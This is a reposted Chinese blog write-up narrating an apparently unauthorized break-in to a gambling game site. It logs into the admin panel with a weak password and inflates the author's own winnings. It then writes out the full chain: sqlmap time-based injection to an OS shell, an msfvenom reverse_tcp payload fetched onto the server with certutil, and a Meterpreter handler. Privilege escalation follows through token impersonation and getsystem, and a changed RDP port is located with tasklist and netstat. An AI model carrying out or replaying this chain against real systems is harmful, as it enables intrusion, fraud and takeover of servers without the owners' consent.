某棋牌站点注入到提权之路

admin
admin
admin
139193
文章
114
评论
2023年6月13日10:41:22评论25 views字数 1407阅读4分41秒阅读模式

声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。

宝子们现在只对常读和星标的公众号才展示大图推送,建议大家把李白你好设为星标”,否则可能就看不到了啦!20年的老文章了分享一哈。

0x01 前言


某棋牌站点注入到提权之路
在某某附近人发来送¥的邀请截图,在棋牌捕鱼上面把赠送的金额打光之后、随之来做个渗透测试....通过意见反馈打到后台地址以及cookie过期....之后
某棋牌站点注入到提权之路


0x02 开始渗透

开局一个后台
某棋牌站点注入到提权之路
界面挺不错的有点高级高级的感觉,咱先来试试弱口令
某棋牌站点注入到提权之路

咦....直接进去了。随后把账户的胜利调到了百分比
某棋牌站点注入到提权之路
某棋牌站点注入到提权之路
打了一上午鱼之后,金币高达52w
突然感觉好像有点什么不对,,,,咱是来做渗透的不是来捕鱼的吧
渗透棋牌不登陆到服务器界面怎么合适呢
某棋牌站点注入到提权之路
咳咳...继续渗透
后台没有上传点 配置文件也不知道路径在哪 ...有点棘手
我们回到登陆框 在账户上加个单引号试试看看有没有sqli
某棋牌站点注入到提权之路
嗯哼..点登陆没反应抓包sqlmap一把梭
某棋牌站点注入到提权之路
嗯...很强 存在延时注入
我们继续看看是否dba权限
某棋牌站点注入到提权之路
ture看来运气很好啊 直接--os-shell
某棋牌站点注入到提权之路
权限有点小啊 ,,,但问题不大 掏出我们的msf
msfvenom -p windows/meterpreter/reverse_tcp lhost="外网ip地址" lport="监听端口" -f exe > msf.exe 生成木马
放置外网方便使我们的目标服务器下载
先在目标服务器创建一个放置木马的文件夹
md c:test
我们使用certutil.exe进行下载
certutil.exe -urlcache -split -f “木马下载地址” C:testtest.exe
某棋牌站点注入到提权之路
木马下载成功我们回到msf
设置使用exploit/multi/handler模块
某棋牌站点注入到提权之路
设置payload
某棋牌站点注入到提权之路
show options 看看需要配置的参数
某棋牌站点注入到提权之路
set LHOST “外网ip” //于木马的ip一致set LPORT "端口" //于木马的监听端口一致
随后 run执行
某棋牌站点注入到提权之路
紧接着目标服务器运行木马
某棋牌站点注入到提权之路

成功反弹shell
某棋牌站点注入到提权之路

某棋牌站点注入到提权之路
因为我们的权限太小所以我们现在要先进行提权
使用use incognito来加载会话令牌模块
然后list_tokens -u来列出会话令牌
某棋牌站点注入到提权之路

使用impersonate_token "WIN-IGSV8O3CA7EAdministrator" 盗取 administrator 令牌 getuid查看一下
某棋牌站点注入到提权之路

嘿嘿嘿 某棋牌站点注入到提权之路
最最最后使用getsystem来获取system权限
某棋牌站点注入到提权之路

咳咳 接下来就是shell进入
某棋牌站点注入到提权之路
cmd提取命令一把梭
接下来就是快快乐乐的登陆远程服务器了
美滋滋的~~某棋牌站点注入到提权之路
(然而事情没那么简单~)
咦....

某棋牌站点注入到提权之路

内部出现错误 咋回事了....难道远程端口被改了吗。。。。
某棋牌站点注入到提权之路
nmap出动扫描一下端口
某棋牌站点注入到提权之路
没有开放3389 ...... 确定以及肯定是改端口了我们回到shell看看
执行 tasklist /svc
找到svchost.exe进程下termservice服务对应的PID
某棋牌站点注入到提权之路
再执行netstat -ano
根据PID号查找对应远程端口,远程端口为5566端口
某棋牌站点注入到提权之路
嘿~这次能完美手工了吧

某棋牌站点注入到提权之路
某棋牌站点注入到提权之路
Very Good~ 某棋牌站点注入到提权之路

0x03 链接获取

文章来源:90sec社区(hs4cky)
原文链接:https://forum.90sec.com/t/topic/945

0x04 往期精彩

某棋牌站点注入到提权之路

如何画出优雅的攻击流程图【攻防复盘必备】


某棋牌站点注入到提权之路

警惕高阶诈骗手法


某棋牌站点注入到提权之路

原文始发于微信公众号(李白你好):某棋牌站点注入到提权之路

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月13日10:41:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   某棋牌站点注入到提权之路https://cn-sec.com/archives/1802386.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息